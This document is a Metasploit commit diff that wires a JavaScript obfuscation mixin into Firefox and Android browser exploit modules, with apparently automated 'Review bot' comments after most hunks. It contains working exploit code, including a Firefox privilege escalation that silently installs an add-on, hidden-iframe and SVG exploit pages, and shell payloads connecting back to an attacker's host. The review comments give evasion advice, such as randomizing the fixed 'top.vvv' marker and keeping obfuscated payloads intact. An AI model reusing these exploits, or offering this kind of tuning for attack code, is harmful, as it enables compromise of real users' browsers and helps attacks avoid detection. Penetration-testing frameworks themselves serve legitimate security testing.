
Land #3844 - Add the JSObfu mixin to Firefox exploits

This commit is contained in:
sinn3r 2014-09-29 11:15:14 -05:00
commit 9e5826c4eb
No known key found for this signature in database
GPG Key ID: 2384DB4EF06F730B
21 changed files with 94 additions and 61 deletions


@ -5,7 +5,7 @@ PATH
actionpack (< 4.0.0)
activesupport (>= 3.0.0, < 4.0.0)
bcrypt
jsobfu (~> 0.1.7)
jsobfu (~> 0.2.0)
json
metasploit-concern (~> 0.2.1)
metasploit-model (~> 0.27.1)
@ -91,7 +91,7 @@ GEM
hike (1.2.3)
i18n (0.6.11)
journey (1.0.4)
jsobfu (0.1.7)
jsobfu (0.2.0)
rkelly-remix (= 0.0.6)
json (1.8.1)
mail (2.5.4)


@ -20,7 +20,7 @@ module Exploit::Android
def add_javascript_interface_exploit_js(arch)
stagename = Rex::Text.rand_text_alpha(5)
script = %Q|
%Q|
function exec(runtime, cmdArr) {
var ch = 0;
var output = '';
@ -84,9 +84,6 @@ module Exploit::Android
for (i in top) { if (attemptExploit(top[i]) === true) break; }
|
# remove comments and empty lines
script.gsub(/\/\/.*$/, '').gsub(/^\s*$/, '')
end
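Review bot: The trailing `gsub` pass that stripped `//` comments and blank lines from the Android script was removed at the end of add_javascript_interface_exploit_js, but nothing in this hunk replaces it, so those comments now reach the target verbatim unless the caller passes the result through js_obfuscate. The Android module touched in this same commit deregisters JsObfuscate, so that caller may not obfuscate at all; it is worth confirming where the stripping is meant to happen now. Dropping the regex is otherwise an improvement, since `\/\/.*$` would also have truncated any string literal containing `//`, such as a URL. If the removal is deliberate, a one-line note above the heredoc such as `# comment/blank-line stripping is left to the JSObfu pipeline` would record the intent. The heredoc body between the two hunks is not shown here.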


@ -7,16 +7,24 @@
#
###
require 'msf/core/exploit/jsobfu'
module Msf
module Exploit::Remote::FirefoxPrivilegeEscalation
# automatically obfuscate anything that runs through `js_exec`
include Msf::Exploit::JSObfu
# Sends the +js+ code to the remote session, which executes it in Firefox's
# privileged javascript context
# privileged javascript context. The code will be obfuscated if the JsObfuscate
# datastore option is set to 1 or higher.
#
# @return [String] the results that were sent back. This can be achieved through
# calling the "send" function, or by just returning the value in +js+
def js_exec(js, timeout=30)
print_status "Running the privileged javascript..."
token = "[[#{Rex::Text.rand_text_alpha(8)}]]"
js = js_obfuscate(js)
session.shell_write("#{token}[JAVASCRIPT]#{js}[/JAVASCRIPT]#{token}")
session.shell_read_until_token("[!JAVASCRIPT]", 0, timeout)
end
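Review bot: js_exec now obfuscates every script before it is written to the session, including privileged code whose failures only come back as the `e.message` string the payload wrapper returns, so a script broken by obfuscation is indistinguishable from a broken exploit. A verbose trace after the `js = js_obfuscate(js)` line, e.g. `vprint_status("Obfuscated javascript:\n#{js}")`, would let an operator see exactly what was sent when the result looks wrong. The doc comment's statement that obfuscation applies "if JsObfuscate is 1 or higher" depends on the option handling inside the JSObfu mixin, which is not visible here; pointing at that option's default would help readers of this method.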


@ -1,9 +1,13 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/exploit/jsobfu'
require 'json'
module Msf::Payload::Firefox
# automatically obfuscate every Firefox payload
include Msf::Exploit::JSObfu
# Javascript source code of setTimeout(fn, delay)
# @return [String] javascript source code that exposes the setTimeout(fn, delay) method
def set_timeout_source
@ -121,14 +125,15 @@ module Msf::Payload::Firefox
var retVal = null;
try {
retVal = Function('send', js[1])(function(r){
this.send = function(r){
if (sent) return;
sent = true;
if (r) {
if (sync) setTimeout(function(){ cb(false, r+tag+"\\n"); });
else cb(false, r+tag+"\\n");
}
});
};
retVal = Function(js[1]).call(this);
} catch (e) { retVal = e.message; }
sync = false;
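Review bot: The wrapper now installs the result callback as `this.send` on the shared receiver object instead of passing it as a parameter to the compiled function, so the callback remains reachable after `Function(js[1]).call(this)` returns and is visible to any later code running against the same `this`. Because `sent` is closed over per script, a stale `send` is a no-op rather than a double report, but it is still state leaking between requests; clearing it after the try/catch (`delete this.send;`) keeps the scope clean, provided every consumer captures the reference synchronously, as the post modules updated in this commit do via `})(this.send)`. The enclosing function and the `js` array it iterates start and end outside this hunk.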


@ -56,7 +56,7 @@ Gem::Specification.new do |spec|
# Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
spec.add_runtime_dependency 'bcrypt'
# Needed for Javascript obfuscation
spec.add_runtime_dependency 'jsobfu', '~> 0.1.7'
spec.add_runtime_dependency 'jsobfu', '~> 0.2.0'
# Needed for some admin modules (scrutinizer_add_user.rb)
spec.add_runtime_dependency 'json'
# Metasploit::Concern hooks


@ -74,6 +74,8 @@ class Metasploit3 < Msf::Exploit::Remote
:os_flavor => 'Android'
}
))
deregister_options('JsObfuscate')
end
# Hooked to prevent BrowserExploitServer from attempting to do JS detection
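Review bot: `deregister_options('JsObfuscate')` removes the option the JSObfu mixin exposes without recording why this module is the exception, and nothing in the hunk lets a reader reconstruct the reason. A comment above it carrying the actual rationale, in the shape of `# JsObfuscate is not offered here: <reason the Android JS must stay unobfuscated>`, would prevent someone from "fixing" it later. Note that the Android mixin in this same commit also stopped stripping comments from its script, so without obfuscation that JS presumably now ships with its comments intact — worth confirming that is intended. The initialize method this sits in begins outside the hunk.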


@ -79,21 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
"p2.constructor.defineProperty(obj,key,{get:runme});"
end
%Q|
<html>
<body>
#{datastore['CONTENT']}
<div id='payload' style='display:none'>
if (!window.done) {
window.AddonManager.getInstallForURL(
'#{get_module_uri}/addon.xpi',
function(install) { install.install() },
'application/x-xpinstall'
);
window.done = true;
}
</div>
<script>
script = js_obfuscate %Q|
try{InstallTrigger.install(0)}catch(e){p=e;};
var p2=Object.getPrototypeOf(Object.getPrototypeOf(p));
p2.__exposedProps__={
@ -116,6 +102,28 @@ class Metasploit3 < Msf::Exploit::Remote
};
for (var i in window) register(window, i);
for (var i in document) register(document, i);
|
js_payload = js_obfuscate %Q|
if (!window.done) {
window.AddonManager.getInstallForURL(
'#{get_module_uri}/addon.xpi',
function(install) { install.install() },
'application/x-xpinstall'
);
window.done = true;
}
|
%Q|
<html>
<body>
#{datastore['CONTENT']}
<div id='payload' style='display:none'>
#{js_payload}
</div>
<script>
#{script}
</script>
</body>
</html>
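Review bot: The obfuscated `js_payload` is interpolated as the text content of the hidden `<div id='payload'>`, not into a `<script>` element, so it is parsed as HTML before the exploit script reads it back. The original snippet contained no `<`, `>` or `&`, but an obfuscator may introduce such characters in rewritten expressions or encoded string literals, and any of them would be treated as markup or an entity and corrupt the stored script; HTML-escaping the value (for instance with `Rex::Text.html_encode(js_payload)`) or carrying it in an attribute would make the round trip safe, assuming the consumer decodes entities the way textContent does. I cannot see how the `#payload` div is consumed because the surrounding method, including its `end`, lies outside this hunk.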


@ -129,24 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
:loader_path => "#{get_module_uri}.swf",
:content => self.datastore['CONTENT'] || ''
}
%Q|
<!doctype html>
<html>
<head>
<base href="chrome://browser/content/">
</head>
<body>
<svg style='position: absolute;top:-500px;left:-500px;width:1px;height:1px'>
<symbol id="#{vars[:symbol_id]}">
<foreignObject>
<object></object>
</foreignObject>
</symbol>
<use />
</svg>
<script>
script = js_obfuscate %Q|
var #{vars[:payload_obj_var]} = #{JSON.unparse({vars[:payload_key] => vars[:payload]})};
var #{vars[:payload_var]} = #{vars[:payload_obj_var]}['#{vars[:payload_key]}'];
function $() {
@ -169,6 +152,27 @@ class Metasploit3 < Msf::Exploit::Remote
document.querySelector('use').setAttributeNS(
"http://www.w3.org/1999/xlink", "href", location.href + "##{vars[:symbol_id]}"
);
|
%Q|
<!doctype html>
<html>
<head>
<base href="chrome://browser/content/">
</head>
<body>
<svg style='position: absolute;top:-500px;left:-500px;width:1px;height:1px'>
<symbol id="#{vars[:symbol_id]}">
<foreignObject>
<object></object>
</foreignObject>
</symbol>
<use />
</svg>
<script>
#{script}
</script>
<iframe style="position:absolute;top:-500px;left:-500px;width:1px;height:1px"
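Review bot: The `script` heredoc passed to js_obfuscate shares `vars[:symbol_id]` with the SVG `<symbol id=...>` markup below it, and only the script side is obfuscated, so the two must still agree after obfuscation. That holds today because the id sits inside the string literal `"##{vars[:symbol_id]}"`, whose value an obfuscator should preserve even if it re-encodes it, whereas `payload_obj_var` and `payload_var` are plain identifiers that may be renamed freely. A comment on the `script = js_obfuscate` line such as `# symbol_id is also referenced from the SVG markup; keep it inside a string literal so obfuscation leaves it intact` would protect that coupling. The enclosing method begins and ends outside this hunk.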


@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote
key = Rex::Text.rand_text_alpha(5 + rand(12))
opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
js = Rex::Exploitation::JSObfu.new(%Q|
js = js_obfuscate %Q|
var opts = #{JSON.unparse(opts)};
var key = opts['#{key}'];
var y = {}, q = false;
@ -85,9 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
return 5;
};
console.time(y);
|)
js.obfuscate
|
%Q|
<!doctype html>
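Review bot: Replacing `Rex::Exploitation::JSObfu.new(...)` plus `js.obfuscate` with `js_obfuscate` makes obfuscation of this exploit's JavaScript conditional on the JsObfuscate datastore option, whereas the old code obfuscated unconditionally. Unless the mixin's default for that option is nonzero — nothing in this hunk shows it — the module's default output is now plain JavaScript, which is a behaviour change rather than a refactor and deserves a line in the commit message or the module's notes. If always-on obfuscation matters for this module, its initialize could override the option's default rather than relying on the mixin's. The method that builds `js` starts before this hunk and ends after it.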


@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
"{},function(){top.vvv=window.open('chrome://browser/content/browser.xul', "+
"'#{r}', 'chrome,top=-9999px,left=-9999px,height=100px,width=100px');})<\/script>"
js = Rex::Exploitation::JSObfu.new(%Q|
js = js_obfuscate %Q|
var opts = #{JSON.unparse(opts)};
var key = opts['#{key}'];
@ -127,10 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote
setTimeout(function(){top.vvv.close();}, 100);
}, 10);
}
|)
js.obfuscate
|
%Q|
<!doctype html>
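Review bot: Obfuscating the main block leaves `top.vvv` as a fixed, hand-written property name that is used both in the plain `<script>` string built above the heredoc (`top.vvv=window.open(...)`) and inside the obfuscated block (`top.vvv.close()`), so it survives obfuscation as a stable marker. Property names are exactly what an obfuscator cannot safely rename, so generating this one in Ruby the way `r` is, e.g. `vvv = Rex::Text.rand_text_alpha(5 + rand(8))` and interpolating `top.#{vvv}` in both places, would remove the artifact. The method that assembles these strings starts before this hunk and ends after it.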


@ -34,6 +34,7 @@ module Metasploit3
<<-EOS
(function(){
window = this;
#{read_file_source if datastore['WSCRIPT']}
#{run_cmd_source if datastore['WSCRIPT']}
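Review bot: The new `window = this;` line assigns an implicit global (no `var`), which relies on the payload running in non-strict code and overwrites any existing `window` binding in that scope, yet the reason it is needed is not recorded. I would guess the helper sources interpolated below reference `window.*` and the payload wrapper in this commit now runs the code via `Function(...).call(this)` where no `window` is in scope, but a comment such as `// helpers below expect a window global; alias the sandbox's this` would make that explicit. The same line is added to the other Firefox payloads in this commit, so one shared explanation in the payload mixin would avoid repeating it. The heredoc and the generate method around it extend beyond this hunk.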


@ -34,6 +34,7 @@ module Metasploit3
def generate
%Q|
(function(){
window = this;
Components.utils.import("resource://gre/modules/NetUtil.jsm");
var lport = #{datastore["LPORT"]};
var rhost = "#{datastore['RHOST']}";


@ -32,6 +32,8 @@ module Metasploit3
<<-EOS
(function(){
window = this;
Components.utils.import("resource://gre/modules/NetUtil.jsm");
var host = '#{datastore["LHOST"]}';
var port = #{datastore["LPORT"]};


@ -62,7 +62,7 @@ class Metasploit3 < Msf::Post
} catch (e) {
send(e);
}
})(send);
})(this.send);
|.strip
end
end


@ -80,7 +80,7 @@ class Metasploit3 < Msf::Post
} catch (e) {
send(e);
}
})(send);
})(this.send);
|.strip
end
end


@ -79,7 +79,7 @@ class Metasploit3 < Msf::Post
} catch (e) {
send(e);
}
})(send);
})(this.send);
|.strip
end
end


@ -78,7 +78,7 @@ class Metasploit3 < Msf::Post
};
setTimeout(evt, 200);
})(send);
})(this.send);
|.strip
end
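Review bot: This module is the one place in the commit where `send` is used asynchronously — `setTimeout(evt, 200)` fires after the IIFE has returned — so it depends on the IIFE's `send` parameter keeping a reference to the callback rather than on `this.send` still being present later. That works with the current payload wrapper, which leaves `this.send` in place after the call, but the reliance is implicit; a comment on the invocation line, e.g. `})(this.send); // capture the stage's callback now: evt runs after we return`, documents it. The IIFE and the method that emits it begin outside this hunk.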


@ -105,7 +105,7 @@ class Metasploit3 < Msf::Post
} catch (e) {
send(e);
}
})(send);
})(this.send);
|
end


@ -1,6 +1,5 @@
require 'spec_helper'
require 'msf/core'
require 'msf/core/exploit/remote/browser_exploit_server'
describe Msf::Exploit::Remote::BrowserExploitServer do
@ -58,6 +57,8 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
server.start_service
end
it_should_behave_like 'Msf::Exploit::JSObfu'
describe "#get_module_resource" do
it "should give me a URI to access the exploit page" do
module_resource = server.get_module_resource
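Review bot: `it_should_behave_like 'Msf::Exploit::JSObfu'` refers to shared examples that this commit defines inside the JSObfu spec file rather than under spec/support, so this spec only finds them if that file happens to have been loaded first; running this spec on its own would fail with a missing shared example group. Moving the shared examples into a spec/support file loaded by spec_helper removes the load-order dependency. Dropping the explicit `require 'msf/core/exploit/remote/browser_exploit_server'` in the same section likewise leans on `msf/core` autoloading the class, which is probably fine but is a second implicit dependency introduced here.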


@ -0,0 +1,8 @@
require 'spec_helper'
require 'msf/core'
describe Msf::Exploit::Remote::FirefoxPrivilegeEscalation do
it_should_behave_like 'Msf::Exploit::JSObfu'
end


@ -3,11 +3,11 @@ require 'msf/core'
require 'msf/core/exploit/jsobfu'
describe Msf::Exploit::JSObfu do
shared_examples_for 'Msf::Exploit::JSObfu' do
subject(:jsobfu) do
mod = ::Msf::Module.new
mod.extend described_class
mod.send(:initialize, {})
mod
end
@ -58,4 +58,5 @@ describe Msf::Exploit::JSObfu do
expect(obj.to_s).to include(js)
end
end
end
end
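Review bot: `shared_examples_for 'Msf::Exploit::JSObfu'` is declared inside the `describe Msf::Exploit::JSObfu` group, yet the browser_exploit_server and firefox_privilege_escalation specs in this commit call `it_should_behave_like` on it from unrelated top-level groups. Shared examples nested in a group are scoped to that group in recent RSpec releases, and even where they register globally they only exist once this file has been loaded, so those specs pass or fail depending on file load order. Moving the block to a file under spec/support/shared/examples, outside any describe, gives every spec deterministic access to it. `mod.send(:initialize, {})` in the subject also re-runs initialize on an already-constructed `Msf::Module`; a comment such as `# re-run initialize so the mixin's options get registered after extend` would explain it, assuming that is the purpose.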